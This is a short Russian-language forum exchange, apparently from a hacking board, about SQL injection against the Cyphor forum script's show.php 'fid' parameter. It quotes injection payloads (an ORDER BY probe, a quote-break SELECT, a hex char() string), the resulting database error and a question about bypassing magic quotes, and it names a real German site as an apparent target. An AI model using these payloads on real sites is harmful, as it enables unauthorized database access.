05.01.2016, 01:21
|
|
Познающий
Регистрация: 26.09.2015
Сообщений: 56
С нами:
5595446
Репутация:
5
|
|
http://www.cantus.de/forum/cyphor/show.php?fid=4 order by 4
Сообщение от anybeni
↑
Запросы с кавычкой не прокатывают, потому что экранируются слешем.
Например пишу:
http://www.site.com/forum/cyphor/show.php?fid=4
' SELECT * FROM cyphor_forums WHERE '1'='1'/*
И получаю:
Database error
: 1064 (You have an error in your SQL syntax near '\' SELECT * FROM cyphor_forums WHERE \'1\'=\'1\'/*' at line 1)
Замена кавычки на %27 или 0х27 или всего запроса на hex выдает ту же ошибку.
Можно ли как-то обойти магические кавычки?
п.с.: в гугле был.
п.п.с.: попробовал еще конвертировать строку
' SELECT * FROM cyphor_forums WHERE id=4
в hex. Получилось
Код:
http://www.site.com/forum/cyphor/show.php?fid=4+char(0x272053454c454354202a2046524f4d20637970686f725f666f72756d732057484552452069643d34)+--
но сайт отозвался той же ошибкой
Т.к. уязвимость аж 2005 года - то скорее всего она везде так или иначе прикрыта. Как например на одном немецком сайте, на котором, как я подозреваю, вы тренируетесь
|
|
|